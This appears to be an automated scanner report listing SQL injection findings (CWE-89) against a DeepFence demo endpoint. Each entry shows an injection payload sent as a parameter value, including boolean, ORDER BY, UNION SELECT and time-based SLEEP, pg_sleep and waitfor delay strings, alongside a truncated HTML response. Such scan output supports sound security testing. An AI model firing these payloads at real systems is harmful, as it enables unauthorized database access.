href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1420\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1421\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1422\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1423\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1424\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ')) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1425\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1426\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1427\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1428\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \");waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1429Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1430\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1431\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1432\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1433\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1434\nScan SQL Injection\nSeverity 